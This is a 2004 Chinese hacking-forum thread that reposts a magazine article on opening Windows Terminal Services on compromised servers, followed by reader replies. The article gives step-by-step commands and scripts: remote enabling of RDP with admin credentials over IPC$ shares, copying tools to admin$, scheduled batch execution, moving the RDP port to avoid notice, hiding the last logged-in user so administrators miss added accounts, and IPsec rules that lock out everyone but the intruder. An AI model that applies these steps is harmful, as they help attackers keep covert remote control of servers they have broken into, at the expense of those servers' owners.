|
![]() | 作者: dahubaobao [dahubaobao]
![]() |
登录 |
文:终端服务全攻略 作者:dahubaobao 主页:http://www.ringz.org 邮件:dahushibaobao@vip.sina.com QQ:382690 发表于黑客防线2004年1期 工具及图片都在压缩包中,解压密码:www.ringz.org http://dahubaobao.go.nease.net/Terminating.rar 欢迎进入环形区,一群技术狂热者的社区,www.ringz.org欢迎你的加入! ===================================================================== 终端服务全攻略 在漏洞不段出现的今天,入侵一台服务器已经不是什么新鲜事,但凡是入侵成功之后,都想尽办法来打开终端服务,什么是终端呢?又怎么在远程打开呢?看完本文,你就会成为一个开“终端的高手”。 什么是终端服务 3389又称Terminal Service,服务终端。在WindowsNT中最先开始使用的一种终端,在Win2K的Professional版本中不可以安装,在Server或以上版本才可以安装这个服务,其服务端口为3389。由于使用简单,方便等特点,一直受系统管理员的青昧。也正式因为他的简便,不产生交互式登陆,可以在后台操作,因此也受到了黑客朋友的喜爱,事实可以说明,现在大多数朋友在入侵之后,都想打开windows终端服务,甚至不惜重启对方的计算机,也要把终端服务安装上,由此可见他的普遍性。另,在在XP系统中又叫做“远程桌面”。 打开终端服务的各种方法 下面进入正题,开始今天的“终端”之旅。(各种工具我会提供) 一, 使用ROTS.VBS脚本 插拨广告: 1, 什么是VBS VBScript的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. 我进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了。 知道什么是VBS了,下面开始进行测试。首先你要获得这台主机的Administrator权限或Local System权限,具体怎么获得在这不必讨论。先来看看ROTS.VBS帮助.。(见图1) ROTS v1.01 Remote Open Terminal services Script, by zzzEVAzzz Welcome to visite www.isgrey.com Usage: cscript c:\scriptpath\ROTS.vbs targetIP username password [port] [/r] port: default number is 3389. /r: auto reboot target. 一般的命令格式:ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]。 下面打开本地CMD,输入:ROTS.vbs XXX.XXX.XX.XXX dahubaobao dahu 3389 /fr 注意: 1,/fr为强制重启,/r为普通重启,不要搞混了。 2, 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。 优点:成功率高。 缺点:必须重新启动。 二,使用批处理(bat) open3389.bat,先来看看帮助:(见图2) *******************Open3389********************* 使用方法: open3389.bat ip user password open3389.bat 目标ip 用户名 密码 还是打开CMD,输入:open3389.bat XXX.XXX.XX.XXX dahubaobao dahu 好了 就这样来打开3389,bat文件真的很好用,建议大家去学习。 优点:不必重新启动。 缺点:成功率不高。 三, 使用HBULOT 这个工具要上传到对方的机器,然后执行,比较麻烦。 C:\>net use \\XXX.XXX.XX.XXX\IPC$ "dahu" /user:"dahubaobao" //建立IPC连接 C:\>copy HBULOT.exe \\ XXX.XXX.XX.XXX \WINNT\admin$ //上传到对方的systeme32目录下。 C:\>net use \\XXX.XXX.XX.XXX\IPC$ /del //断开IPC 然后telent过去,到对方的WINNT\systeme32目录下,直接运行HBULOT.exe即可(见图 3)。 --------------------------------------------------------------------------------------------------------------- 下面介绍的不需要工具,具体请看我的方法 首先telent过去,然后输入query user,使用这个命令的前提是安装终端,如果出现如图4 的情况,就表明安装了终端。如果没有,那就证明没有安装,请看我是怎么做的: C:\> dir c:\sysoc.inf /s //查找sysoc.inf文件的位置 c:\WINNT\inf 的目录 2003-06-19 12:05 3,458 sysoc.inf 1 个文件 3,458 字节 C:\>dir c:\sysocmgr.* /s //查找组件安装程序 c:\WINNT\system32 的目录 1900-10-29 04:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 C:\>echo [Components] > c:\ts C:\>echo TSEnable = on >> c:\ts //建立无人职守安装的参数 C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q 开启3389,并且重新启动,如果 C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q /r 开启3389,不重新启动。 如果重新启动,那等几分钟就可以用客户端连接了,如果没重新启动,那就要等对方重新启动之后,才能连接(看你的耐心喽)。 ---------------------------------------------------------------------------------- 在介绍一种很方便的做法,就是做一个bat文件,在本地运行即可,下面是bat的内容 echo [Components] > c:\ts echo TSEnable = on >> c:\ts C:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q net use \\ip\ipc$ dahu /user:dahubaobao copy 路径:\xxx.bat \\ip\winnt\admin$ at time 00:00:00 xxx.bat 主机执行之后,会自动重启,之后就可以利用3389登陆了。 这个bat文件很容易,前两条语句是“建立无人职守安装的参数”,第三条是真正的“开启终端的命令”,第四条是“IPC连接”,第五是“把bat文件copy到对方的winnt\system32目录下”,最后是用“time获取时间,然后用at命令启动。” (个人推荐这种方法,比较简单,有点IPC知识的就可以实现。) 修改终端服务端口 这一步很重要,我们辛苦的开启了终端服务,不能因为“3389”的暴露而前功尽弃,所以端口是必须修改的,先说一下原理,终端服务安装完成后,会在注册表中增加两个键,其键值分别为16进制的3389,即“0x00000D3D”。现在打开“运行”,输入“regedit”启动注册表编辑器,然后打开HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\Tcp和HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStartions\RDP-TCP子键,修改“PortNumber”,假如我们修改成8080端口,其键值为“1F90”,保存退出,注意,重启之后才能生效,修改完成之后,会到本地,打开客户端,输入:XXX.XXX.XXX.XX:8080,就可以连接了。(见图5,6) 有的朋友对注册表不熟悉,更有甚者恐惧注册表,认为是很难驾御的地方,那好办,下面介绍一个小工具,可以在命令行下修改端口,看我是怎么做的:还是先来看帮助 ======================================================= Change Local or Remote TermService Port Program Code By wawa@21cn.Com Http://www.Haowawa.Com ======================================================= Local Usage: c3389 7358 Remote Usage: c3389 \\192.168.0.1 adminname password 7358 Local Host TermService Port is : 3389 本地修改:c3389 端口 远程修改:c3389 \\XXX.XXX.XXX.XX Admin用户 密码 端口 先来看本地修改: 打开CMD。输入c3389 post,具体见图7。 在来看远程修改: 输入c3389 \\XXX.XXX.XXX.XX adminname password post。 到这里,端口就修改关闭了。 隐藏上次登陆过的用户名 在终端安装完成后,并且你已经登陆过,那么再次登陆就会显示上次登陆过的用户名,如果我们添加的帐户(或克隆)被管理员看到了,那不起疑心才怪呢?所以我们要隐藏登陆过的用户,要实现隐藏,还是要修改注册表,具体看我怎么做:在“运行”中输入“regedit”启动注册表编辑器,依次展开:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子键下的DontDisplayLastUserName,默认键值为“0”,我们修改为“1”,保存,退出,重新启动之后生效。见图8 限制/指定连接终端的地址 现在我们已经给肉鸡看了终端,并且修改了端口,还做了一些简单的维护,但这还是不够的,假如某人知道了我们修改过的端口就是终端服务,那就挂了,所以还要在肉鸡上通过IPSEC这个系统自带的而且功能非常强大的工具来做一下限制,具体请看我的演示: 1,静态IP 假如我的IP是111.222.255.255,我们通过设置IPSEC,来让肉鸡上的终端只通过我的连接,而拒绝除了我以外的所有连接,好,就这么办,先登陆终端,然后打开“管理工具”―“本地安全设置”,设置如下: 首先右键点击“IP安全策略 在本地机器”选择“创建IP策略”,然后打开了一个向导,即“IP安全策略向导”―“下一步”―“名称”―“下一步”取消“激活默认响应规则”―“下一步”―“完成”,这是会重新打开一个“新IP安全策略 属性”(见图9),取消“使用“添加向导””―“添加”―出现“新规则属性”―“添加”―出现“IP筛选器列表”―取消“使用“添加向导””―“添加”―出现“筛选器 属性”,选择“寻址”标签,源地址设为‘任何IP地址’,目的地址设为‘我的IP地址’;在选择“协议”标签,选择协议类型设为‘TCP’,设置IP协议端口‘从任意端口’―‘到此端口8080’―“确定”(见图10,11)--“关闭”―回到“新规则 属性”―选择“新IP筛选器列表”―在选“筛选器操作”标签―取消“使用“添加向导””―“添加”―在“安全措施”标签下选择“阻止”―“确定”―“关闭”(见图12),回到“新规则 属性”―选中“新筛选器操作”―“关闭”―“关闭”―回到“本地安全设置”―选中“新IP安全策略”―右键点击“指派”(见图13),好了,总算设置完了,这样所有的机器就无法连接8080(终端)端口了。 注意:以上都是使用默认的名称,所以大家在设置的时候注意一下。 由于上边的设置,把我自己也挡在了外面,这可不是我所想要的,所以,我们还要建立一条规则,允许我的IP 111.222.255.255访问对方的8080端口,方法如下: 右键点击“新IP安全策略”―“属性”―不选“使用“添加向导””―出现“新规则 属性”―“添加”―出现“IP筛选器列表”―不选“使用“添加向导””―“添加”―出现“筛选器 属性”―选择“寻址”标签,设置成如图14的样子,在选择“协议”标签,设置成如图12的样子,然后“确定”―“关闭”―回到“新规则 属性”―选中“新IP筛选器列表(1)”―在选“筛选器操作”标签―在选“允许”―“关闭”―“关闭”―回到“本地安全设置”。 (见图15) 2,动态IP 在中国,拥有静态IP的人毕竟是少数,大多数朋友还都是拨号,虽然现在ADSL很普遍,但ADSL还是虚拟拨号,即动态IP,所以用上边的方法设置IPSEC肯定是不行的,所以,现在我们要修改上边的一条规则,使IPSEC可以通过 特定子网的连接,方法很简单,其他的都不用改,按照图16的方法设置就可以了。 后记 通过上面的设置,在肉鸡的终端已经“比较”安全了,由于使用IPSEC总感觉很麻烦,所以在上边的设置中特意取消了“使用“添加向导””,因为这样可以更直观一些,并且附上一个IPSEC的动画教程,希望大家喜欢,本文如有错误,还请多多包涵,也可发邮件至 dahushibaobao@vip.sina.com,和我交流。 本贴由环形区原创,欢迎转帖!欢迎进入环形区,一群技术狂热者的社区,www.ringz.org欢迎你的加入! [此贴被 dahubaobao(dahubaobao) 在 03月28日04时48分 编辑过] [此贴被 dahubaobao(dahubaobao) 在 05月17日02时09分 编辑过] |
地主 发表时间: 04-03-21 05:24 |
![]() | 回复: wangsong [wangsong] ![]() |
登录 |
![]() 你加我的QQ吧 307437879 |
B1层 发表时间: 04-03-21 16:20 |
![]() | 回复: ysfilone [ysfilone] ![]() |
登录 |
![]() 多发些再 |
B2层 发表时间: 04-03-22 12:59 |
![]() | 回复: mervin [mervin] ![]() |
登录 |
不错,值得学习的两篇文章! |
B3层 发表时间: 04-03-26 01:10 |
![]() | 回复: haoweir [haoweir] ![]() |
登录 |
路过帮你顶一下 |
B4层 发表时间: 04-03-26 10:43 |
![]() | 回复: dahubaobao [dahubaobao] ![]() |
登录 |
QQ人太多了。。。 呵呵 |
B5层 发表时间: 04-03-28 04:49 |
![]() | 回复: kailangq [kailangq] ![]() |
登录 |
![]() |
B6层 发表时间: 04-04-02 03:33 |
![]() | 回复: snowred [snowred] ![]() |
登录 |
呵呵 |
B7层 发表时间: 04-04-03 11:28 |
![]() | 回复: chiru [chiru] ![]() |
登录 |
支持原创!再接再厉多发些啊 |
B8层 发表时间: 04-04-03 12:20 |
![]() | 回复: aaaaaaaaas [aaaaaaaaas] ![]() |
登录 |
顶啊。支持原创 |
B9层 发表时间: 04-04-16 19:52 |
![]() | 回复: tony [tony8] ![]() |
登录 |
太好了,我就需要这么细致的文章,但我有个问题,就是很多入侵的文章里谈到,上传很多小文件,但我怎么能找到那些小文件那?? |
B10层 发表时间: 04-04-17 11:51 |
![]() | 回复: dahubaobao [dahubaobao] ![]() |
登录 |
什么小文件? |
B11层 发表时间: 04-05-17 02:09 |
![]() | 回复: disun [benww] ![]() |
登录 |
难得在这里遇到dahubaobao,请教两个问题,读了你的<握着你的“手”清除DLL后门>一文,收获挺多,不过还是有些东西不明白 1:远程线程技术 按文中的说法我还是不太明白.请问能否用简单的言语再解释一下. 2:文中最后所提及的"DLL的防范",我认为方法确实是好方法,不过说实在的,有几个人闲着没事,坐那边穷比对system32目录下的EXE和DLL文件,就算要去比对,那也是感觉到系统被做了手脚之后,所以我想请教,有没有哪种更简单的方法来发现系统中存在DLL后门?(最好和查看普通木马一样容易) |
B12层 发表时间: 04-05-17 23:17 |
![]() | 回复: yinjun [yinjun] ![]() |
登录 |
哈哈 顶 |
B13层 发表时间: 04-05-20 22:08 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号